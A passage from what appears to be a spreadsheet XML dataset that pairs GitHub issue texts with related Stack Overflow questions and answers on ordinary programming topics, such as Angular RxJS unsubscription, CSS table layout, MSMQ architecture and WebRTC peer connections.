&lt;p&gt;src=&amp;quot;/assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;./todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;todo_list.png&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C632</t>
  </si>
  <si>
    <t>Should we create an unsubscribe observable mixin? This would automatically handle creating an unsubscribe observable which calls .next() and .complete() in the ngOnDestroy() function. However this would come with the downside there is no in-built linting to detect if observables are being properly unsubscribed. The implementation of this solution would be harder to enforce during reviews.
Example mixin code:
function WithDestroy&lt;T extends Constructor&lt;{}&gt;&gt;(Base: T = (class {} as any)) {
  return class extends Base implements OnDestroy {
    destroy$  = new Subject&lt;void&gt;()
    ngOnDestroy() {
      this.destroy$.next();
    }
  }
}
@Allcharles Allcharles added the question label on Feb 25, 2020
@Allcharles
Collaborator
Author
Allcharles commented on Feb 25, 2020
I'd like your opinion on this @atruskie
@atruskie
Member
atruskie commented on Feb 25, 2020
I'm vaguely aware observables have long lives and need to be unsubscribed from. I'm not entirely sure what problem this is solving?
How is the mixin used in a real class? How does that real class register the observable to be destroyed?
@Allcharles
Collaborator
Author
Allcharles commented on Feb 25, 2020
This is how observables are currently dealt with:
export class Component extends PageComponent implements OnInit, OnDestroy {
  private unsubscribe = new Subject();
  constructor(private api: ProjectsService) {
    super();
  }
  ngOnInit() {
    this.api
      .create(new Project($event))
      .pipe(takeUntil(this.unsubscribe))
      .subscribe(&lt;&lt;INSERT LOGIC&gt;&gt;);
  }
  ngOnDestroy() {
    this.unsubscribe.next();
    this.unsubscribe.complete();
  }
}
The proposed changes will change it to this:
export class Component extends WithDestroy(PageComponent) implements OnInit {
  constructor(private api: ProjectsService) {
    super();
  }
  ngOnInit() {
    this.api
      .create(new Project($event))
      .pipe(takeUntil(this.unsubscribe))
      .subscribe(&lt;&lt;INSERT LOGIC&gt;&gt;);
  }
}
The main difference is that I no longer have to a) define an unsubscribe observable, and b) call its destruction in the ngOnDestroy function. Functionally both of these components are the same, it's just that I have to repeat the code for creating and destroying the unsubscribe observable in every single class which uses an observable which is a lot of redundant code for something that may be handled automatically in the future.
Relevant excerpt from link:
In response Ben mentions that there are discussions right now to allow Observables to hook into the Angular component lifecycle events and Ward suggests an Observable of lifecycle events that a component could subscribe to as a way of knowing when to complete Observables maintained as component internal state.
Relevant link: https://stackoverflow.com/questions/38008334/angular-rxjs-when-should-i-unsubscribe-from-subscription</t>
  </si>
  <si>
    <t>TL;DR
For this question there are two kinds of Observables -
finite
value and
infinite
value.
http
Observables produce
finite
(1) values and something like a DOM event listener Observable produces
infinite
values.
If you manually call
subscribe
(not using async pipe), then
unsubscribe
from
infinite
Observables.
Don't worry about
finite
ones, RxJs will take care of them.
Sources:
I tracked down an answer from Rob Wormald in Angular's Gitter
here
.
He states (I reorganized for clarity and emphasis is mine):
if its
a single-value-sequence
(like an http request)
the
manual cleanup is unnecessary
(assuming you subscribe in the controller manually)
i should say "if its a
sequence that completes
" (of which single value sequences, a la http, are one)
if its an infinite sequence
,
you should unsubscribe
which the async pipe does for you
Also he mentions in
this YouTube video
on Observables that
"they clean up after themselves..."
in the context of Observables that
complete
(like Promises, which always complete because they are always producing one value and ending - we never worried about unsubscribing from Promises to make sure they clean up XHR event listeners, right?)
Also in the
Rangle guide to Angular 2
it reads
In most cases we will not need to explicitly call the
unsubscribe
method unless we want to cancel early or our
Observable
has a longer lifespan than our subscription. The default behavior of
Observable
operators is to dispose of the subscription as soon as
.complete()
or
.error()
messages are published. Keep in mind that RxJS was designed to be used in a "fire and forget" fashion most of the time.
When does the phrase
"our
Observable
has a longer lifespan than our subscription"
apply?
It applies when a subscription is created inside a component which is destroyed before (or not 'long' before) the Observable completes.
I read this as meaning if we subscribe to an
http
request or an Observable that emits 10 values and our component is destroyed before that
http
request returns or the 10 values have been emitted, we are still OK!
When the request does return or the 10th value is finally emitted the Observable will complete and all resources will be cleaned up.
If we look at
this example
from the same Rangle guide we can see that the subscription to
route.params
does require an
unsubscribe()
because we don't know when those
params
will stop changing (emitting new values).
The component could be destroyed by navigating away in which case the route params will likely still be changing (they could technically change until the app ends) and the resources allocated in subscription would still be allocated because there hasn't been a
completion
.
In
this video
from NgEurope Rob Wormald also says you do not need to unsubscribe from Router Observables. He also mentions the
http
service and
ActivatedRoute.params
in
this video
from November 2016.
The Angular tutorial,
the Routing chapter
now states the following:
The
Router
manages the observables it provides and localizes the subscriptions. The subscriptions are cleaned up when the component is destroyed, protecting against memory leaks, so we don't need to unsubscribe from the route
params
Observable
.
Here's a
discussion
on the GitHub Issues for the Angular docs regarding Router Observables where Ward Bell mentions that clarification for all of this is in the works.
I spoke with Ward Bell about this question at NGConf (I even showed him this answer which he said was correct) but he told me the docs team for Angular had a solution to this question that is unpublished (though they are working on getting it approved). He also told me I could update my SO answer with the forthcoming official recommendation.
The solution we should all use going forward is to add a
private ngUnsubscribe = new Subject&lt;void&gt;();
field to all components that have
.subscribe()
calls to Observables within their class code.
We then call
this.ngUnsubscribe.next(); this.ngUnsubscribe.complete();
in our
ngOnDestroy()
methods.
The secret sauce (as noted already by
@metamaker
) is to call
takeUntil(this.ngUnsubscribe)
before each of our
.subscribe()
calls which will guarantee all subscriptions will be cleaned up when the component is destroyed.
Example:
import { Component, OnDestroy, OnInit } from '@angular/core';
// RxJs 6.x+ import paths
import { filter, startWith, takeUntil } from 'rxjs/operators';
import { Subject } from 'rxjs';
import { BookService } from '../books.service';
@Component({
    selector: 'app-books',
    templateUrl: './books.component.html'
})
export class BooksComponent implements OnDestroy, OnInit {
    private ngUnsubscribe = new Subject&lt;void&gt;();
    constructor(private booksService: BookService) { }
    ngOnInit() {
        this.booksService.getBooks()
            .pipe(
               startWith([]),
               filter(books =&gt; books.length &gt; 0),
               takeUntil(this.ngUnsubscribe)
            )
            .subscribe(books =&gt; console.log(books));
        this.booksService.getArchivedBooks()
            .pipe(takeUntil(this.ngUnsubscribe))
            .subscribe(archivedBooks =&gt; console.log(archivedBooks));
    }
    ngOnDestroy() {
        this.ngUnsubscribe.next();
        this.ngUnsubscribe.complete();
    }
}
Note:
It's important to add the
takeUntil
operator as the last one to prevent leaks with intermediate Observables in the operator chain.
More recently, in an episode of
Adventures in Angular
Ben Lesh and Ward Bell discuss the issues around how/when to unsubscribe in a component. The discussion starts at about 1:05:30.
Ward mentions
"right now there's an awful takeUntil dance that takes a lot of machinery"
and Shai Reznik mentions
"Angular handles some of the subscriptions like http and routing"
.
In response Ben mentions that there are discussions right now to allow Observables to hook into the Angular component lifecycle events and Ward suggests an Observable of lifecycle events that a component could subscribe to as a way of knowing when to complete Observables maintained as component internal state.
That said, we mostly need solutions now so here are some other resources.
A recommendation for the
takeUntil()
pattern from RxJs core team member Nicholas Jamieson and a TSLint rule to help enforce it:
https://ncjamieson.com/avoiding-takeuntil-leaks/
Lightweight npm package that exposes an Observable operator that takes a component instance (
this
) as a parameter and automatically unsubscribes during
ngOnDestroy
:
https://github.com/NetanelBasal/ngx-take-until-destroy
Another variation of the above with slightly better ergonomics if you are not doing AOT builds (but we should all be doing AOT now):
https://github.com/smnbbrv/ngx-rx-collector
Custom directive
*ngSubscribe
that works like async pipe but creates an embedded view in your template so you can refer to the 'unwrapped' value throughout your template:
https://netbasal.com/diy-subscription-handling-directive-in-angular-c8f6e762697f
I mention in a comment to Nicholas' blog that over-use of
takeUntil()
could be a sign that your component is trying to do too much and that separating your existing components into
Feature
and
Presentational
components should be considered. You can then
| async
the Observable from the Feature component into an
Input
of the Presentational component, which means no subscriptions are necessary anywhere. Read more about this approach
here
.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking at using MSMQ as a solution to do asynchronous execution in my upcoming project. I want to know the differences between using WCF and frameworks like MassTransit or even hand written MSMQ client to place/read task off MSMQ. 
Basically the application will be several websites (internal through LAN or external through the Internet) reading/writing data through a service layer (be it WCF or normal web service). Then this service layer will do one of two things: 1. write data to database 2. and/or trigger the background process by placing a message in the queue. 3. obviously it can also retrieve data from database. The little agent (a windows service) on the other side of the queue will monitor the queue and execute based on the task command.
This architecture will be quite easy to scale (add more queues and agents) and easy to implement compared to RPC or distributed execution or whatever. And the agent processing doesnâ€™t need to be real time. And the agent and service layer are separate applications except they share the common domain objects and Repositories etc.
What do you think? Architecture suggestions for the above requirements are welcomed. Thank you!
</t>
  </si>
  <si>
    <t>C633</t>
  </si>
  <si>
    <t>wide tables overflow their boundaries
This happens all over our interface. Let's use this solution:
https://stackoverflow.com/questions/24963291/table-overflows-parent-div-when-td-content-is-too-wide</t>
  </si>
  <si>
    <t>Same answer as another very recent topic:
table-layout:fixed;
+ width.
DEMO
table {
    table-layout:fixed;
    width:100%;
}
td {
    border: 1px solid black;
    overflow:hidden;/* optionnal*/
}
#firsttd {
    white-space: nowrap;
}
edit : about comment below :
@MatthieuRiegler
table-layout:fixed; is bad if you want cell with different width.
This is your own opinion without any explanation
here is a demo where table-layout and cell's width can be different:
table {
  width: 100%;
  table-layout: fixed;
}
table,
td,
th {
  border: 1px solid;
}
thead tr th:nth-child(1) {
  width: 5em;
}
thead tr th:nth-child(2) {
  width: 20%;
}
thead tr th:nth-child(3) {
  width: 7.5em;
}
&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head Cell&lt;/th&gt;
      &lt;th&gt;Head-Cell-Text&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
      &lt;td&gt;Cell&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
width
+
table-layout:fixed
might just be a bad idea if no responsiveness is thought aside.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I was building the VSCode source code into a .deb package on Ubuntu 20, I executed the command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npm run gulp vscode-linux-x64
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error log is as follows:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;the following tasks did not complete: vscode-linux-x64&lt;br /&gt;
did you forget to signal async completion?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My packaging environment is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ubuntu20ï¼šLinux VM-8-8-ubuntu 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
nodejs: v20.18.1
vscode source: tag/v1.97.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to be related to the gulp 4.x version in tag/1.97.0.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C634</t>
  </si>
  <si>
    <t>Nothing to look at right now, just organizing some thoughts I have floating around.
OWID tech at the moment is very centralized and about scaling a standard pattern of articles and visualizations. This is effective, but especially as we attract more fun developers and designers, it would be cool to also be able to do some really good once-off creative web projects like Nadieh Bremer or Nicky Case do. I'm particularly thinking of Parable of the Polygons: https://ncase.me/polygons/
How would we actually build those and attach them to the domain? Some considerations:
Netlify has a mechanism for proxying one netlify project on a path to another: https://stackoverflow.com/a/48604942/1983739 This is how the grapher works right now. We could also use it for independent subprojects.
The very old header navigation on the site wouldn't work for such subprojects, since you need to rebake it for every new entry and that couples everything together. If we wanted to have a similar kind of navigation that is compatible we could do it with some JS that grabs an independent list of the entries.
There's no way to really build upon the grapher tech for custom projects right now. That would be one motivation for separating out the frontend as its own library.
In most cases I imagine it would be reasonable for the data and content of any custom projects to go directly in the github repository and be updated manually, so we wouldn't need to worry too much about coupling with the database.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm planning architecture for a web-based application using web services.  It has been recommended that I look into using the ASP.NET MVC Framework.  All of the information I'm finding on the MVC discusses its use with web pages, but I have found nothing regarding web services.  Can the MVC be used for web services? and if so, where might I find resources to support my research effort?
</t>
  </si>
  <si>
    <t>C635</t>
  </si>
  <si>
    <t>Reduce number of dependencies for core library (.net standard)
When adding prerelease 1013 - a lot of System dependencies are also added to the application.
Should we change this? with DisableImplicitFrameworkReferences in the csproj file?
PM&gt; Install-Package OxyPlot.Wpf -Version 2.0.0-unstable1013 -Source https://www.myget.org/F/oxyplot/api/v3/index.json
See also
https://stackoverflow.com/questions/43995354/reducing-dependencies-for-a-net-standard-class-library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please help.&lt;/p&gt;
&lt;p&gt;Iam running Kali Linux 6.12.13 in virtualbox, over ubuntu host. Recently bought Netgear A8000 to use with kali linux.&lt;/p&gt;
&lt;p&gt;Ubuntu is able to register and identify the device once it is plugged into USB but Kali is not identifying it. On virtual box device is added to USB via settings of Kali VM:&lt;/p&gt;
&lt;p&gt;Kali linux 6.12 details:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PRETTY_NAME=&amp;quot;Kali GNU/Linux Rolling&amp;quot;
NAME=&amp;quot;Kali GNU/Linux&amp;quot;
VERSION_ID=&amp;quot;2025.1&amp;quot; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have followed    &lt;code&gt;https://github.com/morrownr/USB-WiFi/blob/main/home/USB_WiFi_Adapters_that_are_supported_with_Linux_in-kernel_drivers.md#axe3000---usb30---24-ghz-5-ghz-and-6-ghz-wifi-6e&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;to install udev rules for it , loaded kernel modules and rebooted but it wont identify the device . And does not get listed in lsmod post reboot, nothing in dmesg too about mt or netgear devices.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C636</t>
  </si>
  <si>
    <t xml:space="preserve">remote logging should have a blacklist concept
the remote logging concept should have a blacklist concept that allows to exclude a certain alias or device id from being passed on to the enabled plugins. the benefit would be that no unneeded data is being sent over to other services.
#!/bin/bash
# From:
http://stackoverflow.com/questions/5014632/how-can-i-parse-a-yaml-file-from-a-linux-shell-script
this_dir=$(cd `dirname $0`; pwd )
this_script=$(basename $0)
function usage(){
  cat&lt;&lt;EOT
Usage:
  $this_script filename.yml
EOT
}
function parse_yaml {
#   local prefix=$2 #--- not used at the moment.
   local printSection=$2
   local prefix=""
   local s='[[:space:]]*' w='[a-zA-Z0-9_]*' fs=$(echo @|tr @ '\034')
   sed -ne "s|^\($s\):|\1|" \
        -e "s|^\($s\)\($w\)$s:$s[\"']\(.*\)[\"']$s\$|\1$fs\2$fs\3|p" \
        -e "s|^\($s\)\($w\)$s:$s\(.*\)$s\$|\1$fs\2$fs\3|p"  $1 |
   awk -F$fs '{
      indent = length($1)/2;
      vname[indent] = $2;
      for (i in vname) {if (i &gt; indent) {delete vname[i]}}
      if (length($3) &gt; 0) {
         vn=""; for (i=0; i&lt;indent; i++) {vn=(vn)(vname[i])("_")}
         printf("%s%s%s=\"%s\"\n", "'$prefix'",vn, $2, $3);
      }
   }'
}
[ -z "$1" ] &amp;&amp; { usage ; exit 0 ; }
parse_yaml $1 $2 | grep ^$2
`
Output from this script, if we onyl want to show the section "remoteLogging"
pi@d1wire-r001fry ~/piLogger/etc $ ../bin/parse_yml ./piLogger.yml.blacklist-template remoteLogging
remoteLogging_enabled="true"
remoteLogging_host="192.168.2.61"
remoteLogging_blacklist="28.123123123"
remoteLogging_piLogger_cloud_deviceIdentifier="SECRET"
remoteLogging_piLogger_cloud_authToken="SECRET"
remoteLogging_piLogger_cloud_blacklist="28.XXYYZZ"
remoteLogging_shiftr_shiftrAuth="SECRET"
</t>
  </si>
  <si>
    <t xml:space="preserve">I've searched the IIS7 MSDN database but can't find any concrete material on how to create custom C#.NET extensions for IIS7, I know that previously in IIS6 you had to write an ISAPI extension in C++ if you wanted to say plug in your own scripting language for websites (this is sort of what I want to do) but in IIS7 you're supposed to be able to write it using C#.NET and utilizing the new plugable architecture of IIS7... but I can't find any sodding docs on how to do it.
Anyone care to point me in the right direction?
</t>
  </si>
  <si>
    <t>C637</t>
  </si>
  <si>
    <t>Develop a Static utility library of class that will manage the CLI calls (system input and output) using a ProcessBuilder
This class needs to expose some simple methods that will allow for a user to make a call something like
Command.awsCommand(String name, JSONObject value );
This would call the helper methods make a CLI call to aws and returning a json object with the results.
Here is a sample reference http://stackoverflow.com/questions/3643939/java-process-with-input-output-stream
to start this issue I would like a simple test class that can take a hardcoded value that can be tested and ensure data is being executed properly.
Make sure that there are proper timeouts used so threads don't hang waiting on resources.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to allow my webrtc video call meeting app have multiple peer connections and have the stream appear on the remote video call dynamically using javascript. I have only two tabs in two windows open on the video test room url. One is incognito and one is regular google chrome browser but both are google chrome browsers. They are both logged in to superusers. The problem is, the remote videos are shown twice of the same user of the remote user.&lt;/p&gt;
&lt;p&gt;This is my video call html file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
  &amp;lt;style&amp;gt;
    button {
      border: 0;
      background-color: orange;
      padding: 10px;
      color: white;
      border-radius: 7px;
    }
    video {
      border-radius: 15px;
    }
    .videoContainer {
      display: flex;
      margin: 20px;
      width: 640px;
    }
    .videoContainer h2 {
      color: white;
      position: relative;
      bottom: -380px;
      left: -350px;
      width: max-content;
    }
    #meet {
      display: flex;
    }
    #recordButton.recording {
      background-color: red;
    }
    #downloadButton {
      background-color: #4caf50;
    }
    button:disabled {
      background-color: #cccccc;
      cursor: not-allowed;
    }
  &amp;lt;/style&amp;gt;
  &amp;lt;title&amp;gt;A Free Bird Video Call&amp;lt;/title&amp;gt;
  &amp;lt;script src=&amp;quot;https://meet.jit.si/external_api.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
  &amp;lt;div id=&amp;quot;meet&amp;quot;&amp;gt;
    &amp;lt;div id=&amp;quot;remote-videos&amp;quot;&amp;gt;
      &amp;lt;div class=&amp;quot;videoContainer&amp;quot;&amp;gt;
        &amp;lt;video id=&amp;quot;localVideo&amp;quot; autoplay playsinline&amp;gt;&amp;lt;/video&amp;gt;
        &amp;lt;h2&amp;gt;{{ request.user.full_name }}&amp;lt;/h2&amp;gt;
      &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;!-- &amp;lt;div class=&amp;quot;videoContainer&amp;quot;&amp;gt;
      &amp;lt;video id=&amp;quot;remoteVideo&amp;quot; autoplay playsinline&amp;gt;&amp;lt;/video&amp;gt;
      &amp;lt;h2&amp;gt;&amp;lt;/h2&amp;gt;
    &amp;lt;/div&amp;gt; --&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div&amp;gt;
    &amp;lt;button onclick=&amp;quot;startCall()&amp;quot;&amp;gt;Start Call&amp;lt;/button&amp;gt;
    &amp;lt;button id=&amp;quot;recordButton&amp;quot; onclick=&amp;quot;toggleRecording()&amp;quot; disabled&amp;gt;
      Start Recording
    &amp;lt;/button&amp;gt;
    &amp;lt;button id=&amp;quot;downloadButton&amp;quot; onclick=&amp;quot;downloadRecording()&amp;quot; disabled&amp;gt;
      Download Recording
    &amp;lt;/button&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;script&amp;gt;
    // Global variables
    let peerConnection = null;
    let localStream = null;
    let isInitiator = false;
    let iceCandidatesQueue = [];
    let mediaRecorder = null;
    let recordedChunks = [];
    let isRecording = false;
    const roomName = &amp;quot;{{ room_name }}&amp;quot;;
    const signalingChannel = new WebSocket(
      `wss://${window.location.host}/ws/webrtc/${roomName}/`
    );
    setupMediaStream();
    signalingChannel.onopen = async () =&amp;gt; {
      console.log(&amp;quot;WebSocket connected!&amp;quot;);
      signalingChannel.send(
        JSON.stringify({
          type: &amp;quot;join&amp;quot;,
          room: roomName,
          username: &amp;quot;{{ request.user.full_name }}&amp;quot;,
        })
      );
    };
    async function setupMediaStream() {
      try {
        localStream = await navigator.mediaDevices.getUserMedia({
          video: true,
          audio: true,
        });
        document.getElementById(&amp;quot;localVideo&amp;quot;).srcObject = localStream;
        console.log(&amp;quot;Local stream setup successful&amp;quot;);
        globalThis.localStream = localStream;
      } catch (err) {
        console.error(&amp;quot;Error accessing media devices:&amp;quot;, err);
        throw err;
      }
    }
    async function initializePeerConnection(localStream) {
      const servers = {'iceServers': [{'urls': 'stun:stun.l.google.com:19302'}]}
      peerConnection = new RTCPeerConnection(servers);
      console.log(&amp;quot;Created peer connection&amp;quot;);
      peerConnection.addStream(globalThis.localStream);
      console.log(&amp;quot;âœ… Track added to peer connection&amp;quot;);
      peerConnection.ontrack = (event) =&amp;gt; {
        const userId = &amp;quot;{{ request.user.id }}&amp;quot;
        console.log(&amp;quot;Received remote track&amp;quot;);
        const remoteVideo = document.getElementById(&amp;quot;remote-videos&amp;quot;);
        const stream = event.streams[0];
        const container = document.createElement(&amp;quot;div&amp;quot;);
        container.classList.add(&amp;quot;videoContainer&amp;quot;);
        container.id = `remote-video-${userId}`;
        const videoElement = document.createElement('video');
        videoElement.srcObject = stream;
        videoElement.play();
        remoteVideo.appendChild(container);
        container.appendChild(videoElement);
        container.appendChild(document.createElement(&amp;quot;h2&amp;quot;));
        setupRecording();
      };
      // ICE candidate handling
      peerConnection.onsignalingstatechange = (event) =&amp;gt; {
        console.log(&amp;quot;Signaling state change:&amp;quot;, peerConnection.signalingState);
      };
      peerConnection.onconnectionstatechange = (event) =&amp;gt; {
        console.log(&amp;quot;Connection state change:&amp;quot;, peerConnection.connectionState);
      };
      return peerConnection;
    }
    async function setupAndStart() {
      try {
        if (!peerConnection) {
          await initializePeerConnection();
          const remoteStreams = peerConnection.getRemoteStreams();
          console.log(remoteStreams);
        }
      } catch (err) {
        console.error(&amp;quot;Error in setupAndStart:&amp;quot;, err);
      }
    }
    async function handleCandidate(message) {
      try {
        if (!peerConnection || !peerConnection.remoteDescription) {
          console.log(&amp;quot;Queueing ICE candidate&amp;quot;);
          iceCandidatesQueue.push(message.candidate);
        }
        if (message.candidate) {
          await peerConnection.addIceCandidate(
            new RTCIceCandidate(message.candidate)
          );
          console.log(&amp;quot;Added ICE candidate&amp;quot;);
        }
      } catch (err) {
        console.error(&amp;quot;Error adding ICE candidate:&amp;quot;, err);
      }
    }
    async function handleOffer(message) {
      try {
        if (!peerConnection) {
          await setupAndStart();
        }
        await peerConnection.setRemoteDescription(
          new RTCSessionDescription({
            type: &amp;quot;offer&amp;quot;,
            sdp: message.sdp,
          })
        );
        peerConnection.onicecandidate = (event) =&amp;gt; {
        if (event.candidate) {
          console.log(&amp;quot;Sending ICE candidate&amp;quot;);
          signalingChannel.send(
            JSON.stringify({
              type: &amp;quot;ice-candidate&amp;quot;,
              candidate: event.candidate,
              username: &amp;quot;{{ request.user.full_name }}&amp;quot;,
            })
          );
          console.log(&amp;quot;ICE candidate sent&amp;quot;);
        }
      };
        // Process queued candidates
        while (iceCandidatesQueue.length &amp;gt; 0) {
          const candidate = iceCandidatesQueue.shift();
          await peerConnection.addIceCandidate(
            new RTCIceCandidate(candidate)
          );
          console.log(&amp;quot;Added queued ICE candidate&amp;quot;);
        }
        const answer = await peerConnection.createAnswer();
        await peerConnection.setLocalDescription(answer);
        signalingChannel.send(
          JSON.stringify({
            type: &amp;quot;answer&amp;quot;,
            sdp: answer.sdp,
            username: &amp;quot;{{ request.user.full_name }}&amp;quot;,
          })
        );
      } catch (err) {
        console.error(&amp;quot;Error handling offer:&amp;quot;, err);
      }
    }
    async function handleAnswer(message) {
      try {
        await peerConnection.setRemoteDescription(
          new RTCSessionDescription({
            type: &amp;quot;answer&amp;quot;,
            sdp: message.sdp,
          })
        );
        // Process queued candidates
        while (iceCandidatesQueue.length &amp;gt; 0) {
          const candidate = iceCandidatesQueue.shift();
          await peerConnection.addIceCandidate(
            new RTCIceCandidate(candidate)
          );
          console.log(&amp;quot;Added queued ICE candidate&amp;quot;);
        }
      } catch (err) {
        console.error(&amp;quot;Error handling answer:&amp;quot;, err);
      }
    }
    async function startCall() {
      try {
        iceCandidatesQueue = [];
        await setupAndStart();
        const offer = await peerConnection.createOffer();
        await peerConnection.setLocalDescription(offer);
        signalingChannel.send(
          JSON.stringify({
            type: &amp;quot;offer&amp;quot;,
            sdp: offer.sdp,
            username: &amp;quot;{{ request.user.full_name }}&amp;quot;,
          })
        );
      } catch (err) {
        console.error(&amp;quot;Error starting call:&amp;quot;, err);
      }
    }
    function updateRemoteUsername(message) {
      const userId = &amp;quot;{{ request.user.id }}&amp;quot;
      const remoteVideoContainer = document.getElementById(`remote-video-${userId}`);
        if (remoteVideoContainer) {
          const remoteNameElement = remoteVideoContainer.querySelector(&amp;quot;h2&amp;quot;);
          if (remoteNameElement) {
            remoteNameElement.textContent = message;
          }
        }
    }
    signalingChannel.onmessage = async (event) =&amp;gt; {
      const message = JSON.parse(event.data);
      console.log(&amp;quot;Received message:&amp;quot;, message);
      try {
        switch (message.type) {
          case &amp;quot;join&amp;quot;:
            if (!message.self) {
              isInitiator = true;
              updateRemoteUsername(message.username);
              await setupAndStart();
            }
            break;
          case &amp;quot;offer&amp;quot;:
              updateRemoteUsername(message.username);
              await handleOffer(message);
            break;
          case &amp;quot;answer&amp;quot;:
            await handleAnswer(message);
            break;
          case &amp;quot;ice-candidate&amp;quot;:
            await handleCandidate(message);
            break;
          case &amp;quot;candidate&amp;quot;:
            await handleCandidate(message);
            break;
          default:
            console.log(&amp;quot;Unknown message type:&amp;quot;, message.type);
        }
      } catch (err) {
        console.error(&amp;quot;Error handling message:&amp;quot;, err);
      }
    };
    async function setupRecording(stream) {
      try {
        // Create a canvas element to combine the videos
        const canvas = document.createElement(&amp;quot;canvas&amp;quot;);
        const ctx = canvas.getContext(&amp;quot;2d&amp;quot;);
        // Get video elements
        const localVideo = document.getElementById(&amp;quot;localVideo&amp;quot;);
        const remoteVideo = document.getElementById(&amp;quot;remoteVideo&amp;quot;);
        // Wait for both streams to be available
        if (!localVideo.srcObject || !remoteVideo.srcObject) {
          console.log(
            &amp;quot;Waiting for both streams before setting up recording...&amp;quot;
          );
          return;
        }
        // Set canvas size to match the video container width and height
        const videoContainer = document.querySelector(&amp;quot;.videoContainer&amp;quot;);
        const containerStyle = window.getComputedStyle(videoContainer);
        canvas.width = videoContainer.offsetWidth * 2; // Width of two videos
        canvas.height = videoContainer.offsetHeight;
        // Create a stream from the canvas
        const canvasStream = canvas.captureStream(30); // 30 FPS
        // Add audio tracks from both streams
        const localAudioTrack = localVideo.srcObject.getAudioTracks()[0];
        const remoteAudioTrack = remoteVideo.srcObject.getAudioTracks()[0];
        if (localAudioTrack) canvasStream.addTrack(localAudioTrack);
        if (remoteAudioTrack) canvasStream.addTrack(remoteAudioTrack);
        // Create MediaRecorder
        mediaRecorder = new MediaRecorder(canvasStream, {
          mimeType: &amp;quot;video/webm;codecs=vp8,opus&amp;quot;,
        });
        // Handle data available event
        mediaRecorder.ondataavailable = (event) =&amp;gt; {
          if (event.data &amp;amp;&amp;amp; event.data.size &amp;gt; 0) {
            recordedChunks.push(event.data);
          }
        };
        // Handle recording stop
        mediaRecorder.onstop = () =&amp;gt; {
          console.log(&amp;quot;Recording stopped&amp;quot;);
          document.getElementById(&amp;quot;downloadButton&amp;quot;).disabled = false;
        };
        // Enable record button
        document.getElementById(&amp;quot;recordButton&amp;quot;).disabled = false;
        // Draw frames to canvas
        function drawFrame() {
          // Draw local video
          ctx.drawImage(localVideo, 0, 0, canvas.width / 2, canvas.height);
          // Draw remote video
          ctx.drawImage(
            remoteVideo,
            canvas.width / 2,
            0,
            canvas.width / 2,
            canvas.height
          );
          // Add names under videos
          ctx.fillStyle = &amp;quot;white&amp;quot;;
          ctx.font = &amp;quot;20px Arial&amp;quot;;
          const localName = &amp;quot;{{ request.user.full_name }}&amp;quot;;
          const remoteName =
            remoteVideo.parentElement.querySelector(&amp;quot;h2&amp;quot;).textContent;
          // Add local name
          ctx.fillText(localName, 10, canvas.height - 20);
          // Add remote name
          ctx.fillText(remoteName, canvas.width / 2 + 10, canvas.height - 20);
